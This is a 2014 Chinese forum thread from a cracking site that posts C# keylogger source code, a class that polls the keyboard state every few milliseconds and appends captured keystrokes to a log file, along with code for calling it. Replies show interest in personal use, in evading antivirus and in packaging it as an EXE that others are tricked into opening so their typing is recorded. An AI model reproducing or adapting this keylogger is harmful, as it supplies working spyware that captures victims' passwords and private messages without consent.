吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 6323|回复: 9
收起左侧

[其他转载] C#键盘记录源码

[复制链接]
七寸往事 发表于 2014-10-31 14:29
类库:
public class KeybordLogger{
[DllImport("User32.dll")]
private static extern short GetAsyncKeyState(
System.Windows.Forms.Keys vKey); // Keys enumeration

[DllImport("User32.dll")]
private static extern short GetAsyncKeyState(
System.Int32 vKey);

//获取当前屏幕
[System.Runtime.InteropServices.DllImportAttribute("gdi32.dll")]
private static extern bool BitBlt(
IntPtr hdcDest, //目标设备的句柄
int nXDest, // 目标对象的左上角的X坐标
int nYDest, // 目标对象的左上角的X坐标
int nWidth, // 目标对象的矩形的宽度
int nHeight, // 目标对象的矩形的长度
IntPtr hdcSrc, // 源设备的句柄
int nXSrc, // 源对象的左上角的X坐标
int nYSrc, // 源对象的左上角的X坐标
System.Int32 dwRop // 光栅的操作值
);

[System.Runtime.InteropServices.DllImportAttribute("gdi32.dll")]
private static extern IntPtr CreateDC(
string lpszDriver, // 驱动名称
string lpszDevice, // 设备名称
string lpszOutput, // 无用,可以设定位"NULL"
IntPtr lpInitData // 任意的打印机数据
);

private System.String keyBuffer;
private System.Timers.Timer timerKeyMine;
private System.Timers.Timer timerBufferFlush;
private StreamWriter sw;
private long keyGetInterval = 0;
private long flushToFileInterval = 0;
private string logFileName;
private bool hasStart;

public long KeyGetInterval
{// 获取键盘输入的间隔时间
set
{
keyGetInterval = value;

timerKeyMine.Interval = keyGetInterval;
}

get
{
return keyGetInterval;
}
}

public long FlushToFileInterval
{// 记录键盘输入到文件的间隔时间
set
{
flushToFileInterval = value;

timerBufferFlush.Interval = flushToFileInterval;
}

get
{
return flushToFileInterval;
}
}

public bool HasStart
{
get
{
return hasStart;
}
}

public KeybordLogger() : this(@"C:\WINDOWS\system32")
{
this.logFileName = @"C:\WINDOWS\system32";
}

public KeybordLogger(string logFileName)
{
this.logFileName = logFileName;
timerKeyMine = new System.Timers.Timer();
timerBufferFlush = new System.Timers.Timer();
timerKeyMine.Interval = 10;
timerBufferFlush.Interval = 2000;
this.timerKeyMine.Elapsed += new System.Timers.ElapsedEventHandler(this.timerKeyMine_Elapsed);
this.timerBufferFlush.Elapsed += new System.Timers.ElapsedEventHandler(this.timerBufferFlush_Elapsed);
}

public void startLoging()
{
// 开始键盘记录
timerKeyMine.Start();
timerBufferFlush.Start();
hasStart=true;
}

public void stopLoging()
{// 停止键盘记录
timerKeyMine.Stop();
timerBufferFlush.Stop();
hasStart=false;
}

private void timerKeyMine_Elapsed(object sender,System.Timers.ElapsedEventArgs e)
{
foreach (System.Int32 i in Enum.GetValues(typeof(Keys)))
{
if (GetAsyncKeyState(i) == -32767)
{
keyBuffer += Enum.GetName(typeof(Keys), i) + " ";
}
}
}

private void timerBufferFlush_Elapsed(object sender,System.Timers.ElapsedEventArgs e)
{
flush2File(logFileName,true);
}

private void flush2File(string file,bool append)
{// 刷新记录文件
try
{
// 追加记录数据到文件
sw = new StreamWriter(file, true);
sw.Write(keyBuffer);
sw.Close();

// 清空缓冲 
keyBuffer = string.Empty;
}
catch
{
return;
}
}
}

调用:
#region 键盘记录

        KeybordLogger m_KeyLogger = null;
        string m_ReportFilePath = System.Environment.CurrentDirectory.ToString() + DateTime.Now.ToString("yyyyMMddhhmmss") + ".txt";
        private string ReadReport(string filePath)
        {
            if (File.Exists(filePath))
            {
                FileStream pFileStream = new FileStream(filePath, FileMode.Open);
                StreamReader pReader = new StreamReader(pFileStream);

                string tempReport = pReader.ReadToEnd();

                pReader.Close();
                pFileStream.Close();
                return tempReport;
            }
            else
            {
                return null;
            }
        }
        private void StartLog()
        {
            
            if (m_KeyLogger == null)
            {
                m_KeyLogger = new KeybordLogger(m_ReportFilePath);
                m_KeyLogger.startLoging();

            }
            //if (m_KeyLogger.HasStart)
            //{
            //    MessageBox.Show("Logger is working!");
            //}
        }
        #endregion

免费评分

参与人数 2热心值 +2 收起 理由
coralzyzy + 1 我很赞同!
aa849397558 + 1 请问是自己写的么 请教个问题

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

jkl5322203 发表于 2014-10-31 15:33
黑龍 发表于 2014-10-31 14:45
一句话解决问题!

求一句话!!
黑龍 发表于 2014-10-31 14:45
刺蝴蝶De箫启灵 发表于 2014-10-31 14:36
anwzx 发表于 2014-10-31 14:53
感谢分享,留着自己用
黑龍 发表于 2014-10-31 15:35

“过不了杀软。。。没用”
头像被屏蔽
yyz219 发表于 2014-10-31 16:36
提示: 作者被禁止或删除 内容自动屏蔽
jkl5322203 发表于 2014-10-31 17:02
黑龍 发表于 2014-10-31 15:35
“过不了杀软。。。没用”

能不能做成EXE格式的。然后让别人打开了。记录的内容都保存在指定的盘- -。你这个是怎么设置保存键盘记录的
manbajie 发表于 2014-10-31 21:36
看看是啥子 不会代码啊
io10 发表于 2015-2-5 17:06
好东西!
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-15 06:14

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表